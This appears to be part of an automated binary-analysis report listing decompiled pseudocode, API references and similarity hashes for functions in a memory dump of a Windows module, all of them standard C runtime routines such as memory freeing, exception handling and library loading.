0x73211ff0
0x73211ff5
0x73211ffb
0x73212009
0x7321201a
0x7321201d
0x73212020
0x00000000
0x00000000
0x73212025
0x73212028
0x73212028
0x7321202c
0x7321202f
0x7321204e
0x73212051
0x73212054
0x7321205e
0x73212060
0x73212069
0x7321206b
0x7321206b
0x7321206d
0x73212070
0x73212072
0x7321207a
0x7321207c
0x7321207e
0x00000000
0x00000000
0x73212082
0x73212082
0x73212084
0x00000000
0x00000000
0x73212086
0x73212088
0x7321208a
0x7321208c
0x7321208c
0x73212090
0x73212093
0x73212095
0x00000000
0x00000000
0x73212099
0x7321209a
0x7321209b
0x7321209d
0x00000000
0x7321209f
0x7321209f
0x7321209f
0x00000000
0x7321209d
0x732120bd
0x732120c0
0x732120c3
0x00000000
0x732120c3
0x732120a2
0x732120b6
0x732120b6
0x732120bc
0x00000000
0x732120c6
0x732120c6
0x732120c9
0x732120c9
0x73212031
0x73212031
0x00000000
0x73212031
0x00000000
0x7321202f
0x73212039
0x7321203b
0x7321203e
0x73212040
0x00000000
0x73212046
0x73212046
0x00000000
0x73212046
0x00000000
0x73212040
0x73211fd8
0x00000000

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e80396549e0103e6cda2f4736857fc4b01d5c6d7526b72efe07525ab8dd29006
Instruction ID: 1989f9b3da8eada7934c47131c9a149aa5fe7d37e0ea310ca0cc22c58c1cf368
Opcode Fuzzy Hash: e80396549e0103e6cda2f4736857fc4b01d5c6d7526b72efe07525ab8dd29006
Instruction Fuzzy Hash: B6417C75E0021ACFCB04CF69C690AAEB7F5FF49204B1441AEE945E7352D331AA95CB90

Uniqueness

Uniqueness Score: -1.00%

Function 732158F5, Relevance: .0, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E732158F5(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E73217464(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x73215902
0x73215904
0x73215907
0x7321590a
0x7321590d
0x7321591e
0x73215920
0x7321590f
0x73215913
0x7321591c
0x00000000
0x00000000
0x7321591c
0x73215927

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40d99c6700238775ed74573daadd484035714786c77fdc3c5f2de5db595adc1e
Instruction ID: e9fdb8bbd0056cbef710915555646aeb3c4187a790ad8e5251258c76f2472327
Opcode Fuzzy Hash: 40d99c6700238775ed74573daadd484035714786c77fdc3c5f2de5db595adc1e
Instruction Fuzzy Hash: 5FE04672925228EBCB14DBCC8A40A9AF7FCEB49A21B2101DAF905D3200C6B09E60D7C1

Uniqueness

Uniqueness Score: -1.00%

Function 732182B7, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E732182B7(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x732316f8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E73215C03(_t46);
							E7321A1E9( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E73215C03(_t47);
							E7321A2E7( *((intOrPtr*)(_t74 + 0x88)));
						}
						E73215C03( *((intOrPtr*)(_t74 + 0x7c)));
						E73215C03( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E73215C03( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E73215C03( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E73215C03( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E73215C03( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E7321842A( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x73231640) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E73215C03(_t31);
							E73215C03( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t22 = _t70 - 4; // 0xfffffe87
						_t29 =  *_t22;
						if(_t29 != 0 &&  *_t29 == 0) {
							E73215C03(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E73215C03(_t74);
			}

0x732182bf
0x732182c3
0x732182cb
0x732182d4
0x732182d9
0x732182e0
0x732182e8
0x732182f0
0x732182fb
0x73218301
0x73218302
0x7321830a
0x73218312
0x7321831d
0x73218323
0x73218327
0x73218332
0x73218338
0x732182d9
0x73218339
0x73218341
0x73218354
0x73218367
0x73218375
0x73218380
0x73218385
0x7321838e
0x73218396
0x73218397
0x7321839d
0x732183a0
0x732183a3
0x732183aa
0x732183ac
0x732183b0
0x732183b8
0x732183bf
0x732183c5
0x732183c6
0x732183c6
0x732183cd
0x732183cf
0x732183cf
0x732183d4
0x732183dc
0x732183e1
0x732183e2
0x732183e2
0x732183e5
0x732183e8
0x732183eb
0x732183ee
0x732183ee
0x73218400

APIs

___free_lconv_mon.LIBCMT ref: 732182FB

Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A206
Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A218
Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A22A
Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A23C
Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A24E
Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A260
Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A272
Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A284
Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A296
Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A2A8
Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A2BA
Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A2CC
Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A2DE

_free.LIBCMT ref: 732182F0

Part of subcall function 73215C03: HeapFree.KERNEL32(00000000,00000000,?,73214E53), ref: 73215C19
Part of subcall function 73215C03: GetLastError.KERNEL32(?,?,73214E53), ref: 73215C2B

_free.LIBCMT ref: 73218312
_free.LIBCMT ref: 73218327
_free.LIBCMT ref: 73218332
_free.LIBCMT ref: 73218354
_free.LIBCMT ref: 73218367
_free.LIBCMT ref: 73218375
_free.LIBCMT ref: 73218380
_free.LIBCMT ref: 732183B8
_free.LIBCMT ref: 732183BF
_free.LIBCMT ref: 732183DC
_free.LIBCMT ref: 732183F4

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: ee11d6b2fe213dca737c59fd41decbce36efa21d53ee10e3308819f878e9e21b
Instruction ID: 1d2b0eec6b7159428b0a0ac771849f0fdd7fe78d1dc1c80f4eecf4aa15ca4e08
Opcode Fuzzy Hash: ee11d6b2fe213dca737c59fd41decbce36efa21d53ee10e3308819f878e9e21b
Instruction Fuzzy Hash: 45314D71600707DFEB219E79EB80B8BB3F9EF01650F28445AE45AD7190DFB1A9E48B11

Uniqueness

Uniqueness Score: -1.00%

Function 732154BD, Relevance: 15.1, APIs: 10, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E732154BD(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x7321dc08;
				if(_t68 != 0x7321dc08) {
					E73215C03(_t68);
					_t36 = _a4;
				}
				E73215C03( *((intOrPtr*)(_t36 + 0x3c)));
				E73215C03( *((intOrPtr*)(_a4 + 0x30)));
				E73215C03( *((intOrPtr*)(_a4 + 0x34)));
				E73215C03( *((intOrPtr*)(_a4 + 0x38)));
				E73215C03( *((intOrPtr*)(_a4 + 0x28)));
				E73215C03( *((intOrPtr*)(_a4 + 0x2c)));
				E73215C03( *((intOrPtr*)(_a4 + 0x40)));
				E73215C03( *((intOrPtr*)(_a4 + 0x44)));
				E73215C03( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E73215305(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E73215366(_t67, _t72, _t73, _t77);
			}

0x732154bd
0x732154bd
0x732154bd
0x732154c2
0x732154c8
0x732154ca
0x732154d0
0x732154d3
0x732154d8
0x732154db
0x732154df
0x732154ea
0x732154f5
0x73215500
0x7321550b
0x73215516
0x73215521
0x7321552c
0x7321553a
0x73215545
0x7321554d
0x7321554e
0x73215551
0x73215557
0x7321555b
0x7321555f
0x73215560
0x7321556a
0x73215570
0x73215571
0x73215574
0x7321557a
0x7321557e
0x73215582
0x7321558b

APIs

_free.LIBCMT ref: 732154D3

Part of subcall function 73215C03: HeapFree.KERNEL32(00000000,00000000,?,73214E53), ref: 73215C19
Part of subcall function 73215C03: GetLastError.KERNEL32(?,?,73214E53), ref: 73215C2B

_free.LIBCMT ref: 732154DF
_free.LIBCMT ref: 732154EA
_free.LIBCMT ref: 732154F5
_free.LIBCMT ref: 73215500
_free.LIBCMT ref: 7321550B
_free.LIBCMT ref: 73215516
_free.LIBCMT ref: 73215521
_free.LIBCMT ref: 7321552C
_free.LIBCMT ref: 7321553A

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 42ba936771a41a3af233d404b7b7398e0761864f3c9a0596032715b5b6ef73d2
Instruction ID: b8a3698cdd26e863128c60c18b12ff3a9e699dccf22ab2734ee6f8872239990d
Opcode Fuzzy Hash: 42ba936771a41a3af233d404b7b7398e0761864f3c9a0596032715b5b6ef73d2
Instruction Fuzzy Hash: 5521ADBA904209AFDB41DF98C940FDE7BF9FF08640F1141A6F5159B121EBB1DAA4DB80

Uniqueness

Uniqueness Score: -1.00%

Function 73213470, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E73213470(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v40;
				void* __esi;
				char _t53;
				signed int _t60;
				intOrPtr _t61;
				void* _t62;
				intOrPtr* _t63;
				intOrPtr _t65;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t73;
				intOrPtr _t74;
				signed int _t78;
				char _t80;
				intOrPtr _t91;
				intOrPtr _t94;
				intOrPtr* _t96;
				intOrPtr* _t98;
				void* _t99;
				void* _t102;
				void* _t103;
				void* _t110;

				_t87 = __edx;
				_push(__ebx);
				_t73 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t73 = E7321C6D0(__ecx,  *_t73);
				_t74 = _a8;
				_t6 = _t74 + 0x10; // 0x11
				_t94 = _t6;
				_push(_t94);
				_v20 = _t94;
				_v12 =  *(_t74 + 8) ^  *0x73231004;
				E73213430(_t74, __edx, __edi, _t94,  *(_t74 + 8) ^  *0x73231004);
				E73213A17(_a12);
				_t53 = _a4;
				_t103 = _t102 + 0x10;
				_t91 =  *((intOrPtr*)(_t74 + 0xc));
				if(( *(_t53 + 4) & 0x00000066) != 0) {
					__eflags = _t91 - 0xfffffffe;
					if(_t91 != 0xfffffffe) {
						_t87 = 0xfffffffe;
						E73213A00(_t74, 0xfffffffe, _t94, 0x73231004);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t53;
					_v28 = _a12;
					 *((intOrPtr*)(_t74 - 4)) =  &_v32;
					if(_t91 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t78 = _v12;
							_t60 = _t91 + (_t91 + 2) * 2;
							_t74 =  *((intOrPtr*)(_t78 + _t60 * 4));
							_t61 = _t78 + _t60 * 4;
							_t79 =  *((intOrPtr*)(_t61 + 4));
							_v24 = _t61;
							if( *((intOrPtr*)(_t61 + 4)) == 0) {
								_t80 = _v5;
								goto L7;
							} else {
								_t87 = _t94;
								_t62 = E732139A0(_t79, _t94);
								_t80 = 1;
								_v5 = 1;
								_t110 = _t62;
								if(_t110 < 0) {
									_v16 = 0;
									L13:
									_push(_t94);
									E73213430(_t74, _t87, _t91, _t94, _v12);
									goto L14;
								} else {
									if(_t110 > 0) {
										_t63 = _a4;
										__eflags =  *_t63 - 0xe06d7363;
										if( *_t63 == 0xe06d7363) {
											__eflags =  *0x7321d14c;
											if(__eflags != 0) {
												_t69 = E7321C570(__eflags, 0x7321d14c);
												_t103 = _t103 + 4;
												__eflags = _t69;
												if(_t69 != 0) {
													_t98 =  *0x7321d14c; // 0x73213645
													 *0x7321d104(_a4, 1);
													 *_t98();
													_t94 = _v20;
													_t103 = _t103 + 8;
												}
												_t63 = _a4;
											}
										}
										_t88 = _t63;
										E732139E0(_t63, _a8, _t63);
										_t65 = _a8;
										__eflags =  *((intOrPtr*)(_t65 + 0xc)) - _t91;
										if( *((intOrPtr*)(_t65 + 0xc)) != _t91) {
											_t88 = _t91;
											E73213A00(_t65, _t91, _t94, 0x73231004);
											_t65 = _a8;
										}
										 *((intOrPtr*)(_t65 + 0xc)) = _t74;
										_t66 = E73213430(_t74, _t88, _t91, _t94, _v12);
										E732139C0();
										asm("int3");
										__imp__InterlockedFlushSList(_v40, _t99, _t94);
										__eflags = _t66;
										if(_t66 != 0) {
											_push(_t94);
											do {
												_t96 =  *_t66;
												E73215091(_t66);
												_t66 = _t96;
												__eflags = _t96;
											} while (_t96 != 0);
											return _t66;
										}
										return _t66;
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t91 = _t74;
						} while (_t74 != 0xfffffffe);
						if(_t80 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}

0x73213470
0x73213476
0x73213477
0x7321347b
0x7321347c
0x73213482
0x7321348e
0x73213490
0x73213496
0x73213496
0x7321349f
0x732134a1
0x732134a4
0x732134a7
0x732134af
0x732134b4
0x732134b7
0x732134ba
0x732134c1
0x7321351d
0x73213520
0x73213528
0x7321352f
0x00000000
0x7321352f
0x00000000
0x732134c3
0x732134c3
0x732134c9
0x732134cf
0x732134d5
0x73213540
0x73213549
0x732134d7
0x732134d7
0x732134d7
0x732134dd
0x732134e0
0x732134e3
0x732134e6
0x732134e9
0x732134ee
0x73213504
0x00000000
0x732134f0
0x732134f0
0x732134f2
0x732134f7
0x732134f9
0x732134fc
0x732134fe
0x73213514
0x73213534
0x73213534
0x73213538
0x00000000
0x73213500
0x73213500
0x7321354a
0x7321354d
0x73213553
0x73213555
0x7321355c
0x73213563
0x73213568
0x7321356b
0x7321356d
0x7321356f
0x7321357c
0x73213582
0x73213584
0x73213587
0x73213587
0x7321358a
0x7321358a
0x7321355c
0x73213590
0x73213592
0x73213597
0x7321359a
0x7321359d
0x732135a5
0x732135a9
0x732135ae
0x732135ae
0x732135b5
0x732135b8
0x732135c8
0x732135cd
0x732135d4
0x732135da
0x732135dc
0x732135de
0x732135df
0x732135df
0x732135e2
0x732135e7
0x732135ea
0x732135ea
0x00000000
0x732135ee
0x732135f0
0x73213502
0x00000000
0x73213502
0x73213500
0x732134fe
0x00000000
0x73213507
0x73213507
0x73213509
0x73213510
0x00000000
0x73213512
0x00000000
0x73213510
0x732134d5
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 732134A7
___except_validate_context_record.LIBVCRUNTIME ref: 732134AF
_ValidateLocalCookies.LIBCMT ref: 73213538
__IsNonwritableInCurrentImage.LIBCMT ref: 73213563
_ValidateLocalCookies.LIBCMT ref: 732135B8

Strings

csm, xrefs: 7321354D
D2!s, xrefs: 7321357C

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: D2!s$csm
API String ID: 1170836740-1624946294
Opcode ID: d233cc3bb4c12bc4b105e8c9594e7e0e14edb81dbc9765722738a6315a471e93
Instruction ID: 40a4007da9a26e43b350027815c9d46ee295f00639de5d590cce6f864a0b85ea
Opcode Fuzzy Hash: d233cc3bb4c12bc4b105e8c9594e7e0e14edb81dbc9765722738a6315a471e93
Instruction Fuzzy Hash: 5A412934A04206AFCF01CF15C940B9EBFF6AF49724F148155DA156B385D732DAA1CF90

Uniqueness

Uniqueness Score: -1.00%

Function 73217318, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E73217318(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x73232158 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x7321def8 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E73215283(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E73215283(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x73217321
0x732173cb
0x73217329
0x7321732b
0x73217332
0x73217334
0x7321733a
0x73217347
0x7321735c
0x73217360
0x732173b2
0x732173b2
0x732173b7
0x732173bb
0x732173be
0x732173be
0x732173c4
0x732173c6
0x732173dd
0x732173d6
0x732173dc
0x732173dc
0x732173c8
0x732173c8
0x00000000
0x732173c8
0x73217362
0x7321736b
0x732173a2
0x732173a2
0x732173a4
0x732173a6
0x00000000
0x00000000
0x732173ae
0x00000000
0x732173ae
0x73217375
0x7321737a
0x7321737f
0x00000000
0x00000000
0x73217389
0x7321738e
0x73217393
0x00000000
0x00000000
0x73217398
0x7321739e
0x00000000
0x7321739e
0x7321733f
0x00000000
0x00000000
0x00000000
0x73217345
0x732173d4
0x00000000

Strings

ext-ms-, xrefs: 73217383
api-ms-, xrefs: 7321736F
SN!s, xrefs: 7321731A

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: SN!s$api-ms-$ext-ms-
API String ID: 0-500871989
Opcode ID: 30ef344301d24bc738b7821dcd6b7507aab3dce2723a69620915edfa27efe421
Instruction ID: 17b905ed7034e43b0af1b707d3e0819c060dc26186d21127cd2dcb2849ca788d
Opcode Fuzzy Hash: 30ef344301d24bc738b7821dcd6b7507aab3dce2723a69620915edfa27efe421
Instruction Fuzzy Hash: 88213873A04227EBD712B62DCF44B5A37EC9F80760F250261ED0AA72C0DB34ECA085E0

Uniqueness

Uniqueness Score: -1.00%

Function 7321A388, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E7321A388(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E7321A350(_t45, 7);
					E7321A350(_t45 + 0x1c, 7);
					E7321A350(_t45 + 0x38, 0xc);
					E7321A350(_t45 + 0x68, 0xc);
					E7321A350(_t45 + 0x98, 2);
					E73215C03( *((intOrPtr*)(_t45 + 0xa0)));
					E73215C03( *((intOrPtr*)(_t45 + 0xa4)));
					E73215C03( *((intOrPtr*)(_t45 + 0xa8)));
					E7321A350(_t45 + 0xb4, 7);
					E7321A350(_t45 + 0xd0, 7);
					E7321A350(_t45 + 0xec, 0xc);
					E7321A350(_t45 + 0x11c, 0xc);
					E7321A350(_t45 + 0x14c, 2);
					E73215C03( *((intOrPtr*)(_t45 + 0x154)));
					E73215C03( *((intOrPtr*)(_t45 + 0x158)));
					E73215C03( *((intOrPtr*)(_t45 + 0x15c)));
					return E73215C03( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x7321a38e
0x7321a393
0x7321a39c
0x7321a3a7
0x7321a3b2
0x7321a3bd
0x7321a3cb
0x7321a3d6
0x7321a3e1
0x7321a3ec
0x7321a3fa
0x7321a408
0x7321a419
0x7321a427
0x7321a435
0x7321a440
0x7321a44b
0x7321a456
0x00000000
0x7321a466
0x7321a46b

APIs

Part of subcall function 7321A350: _free.LIBCMT ref: 7321A375

_free.LIBCMT ref: 7321A3D6

Part of subcall function 73215C03: HeapFree.KERNEL32(00000000,00000000,?,73214E53), ref: 73215C19
Part of subcall function 73215C03: GetLastError.KERNEL32(?,?,73214E53), ref: 73215C2B

_free.LIBCMT ref: 7321A3E1
_free.LIBCMT ref: 7321A3EC
_free.LIBCMT ref: 7321A440
_free.LIBCMT ref: 7321A44B
_free.LIBCMT ref: 7321A456
_free.LIBCMT ref: 7321A461

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5efe60baf44d8ba1c93d5764bc9e0069d11d7209c685432ebbda561d8b9dfbd0
Instruction ID: dc832b041975d1efa4683b4469c0d4dc151a4db45cbd0c0f46cb3cada4ac0c93
Opcode Fuzzy Hash: 5efe60baf44d8ba1c93d5764bc9e0069d11d7209c685432ebbda561d8b9dfbd0
Instruction Fuzzy Hash: 70115871540B05BFF670ABB4CE05FCBB7DC5F05710F444815BA9DA6050DAF6B5A48750

Uniqueness

Uniqueness Score: -1.00%

Function 732147C0, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 31
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E732147C0(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x7321d104(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x732147c6
0x732147ca
0x732147d5
0x732147dd
0x732147e8
0x732147ee
0x732147f2
0x732147f9
0x732147ff
0x732147ff
0x73214801
0x73214806
0x00000000
0x7321480b
0x73214814

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,73214772,?,?,7321473A,?,00000001,?), ref: 732147D5
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 732147E8
FreeLibrary.KERNEL32(00000000,?,?,73214772,?,?,7321473A,?,00000001,?), ref: 7321480B

Strings

CorExitProcess, xrefs: 732147E0
mscoree.dll, xrefs: 732147CE
D2!s, xrefs: 732147F9

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$D2!s$mscoree.dll
API String ID: 4061214504-100024862
Opcode ID: 13a031999d0579f6c61ebf6410af72e1332cfb7cff74f784a977b59e6436e63c
Instruction ID: 1348594bb2f27c1d7eddcc7a489f7a4f60635d0d8a50a058fa7f7e49d985ee27
Opcode Fuzzy Hash: 13a031999d0579f6c61ebf6410af72e1332cfb7cff74f784a977b59e6436e63c
Instruction Fuzzy Hash: 44F05E3391012AFBCB01AB51DF09BADBBB8EB00755F208264EC0AA7150DB718E51EA90

Uniqueness

Uniqueness Score: -1.00%

Function 7321949B, Relevance: 9.3, APIs: 6, Instructions: 319
fileCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E7321949B(void* __eflags, intOrPtr _a4, signed int _a8, signed char _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				signed char _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed char _v84;
				intOrPtr _v88;
				signed int _v92;
				char _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed char _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
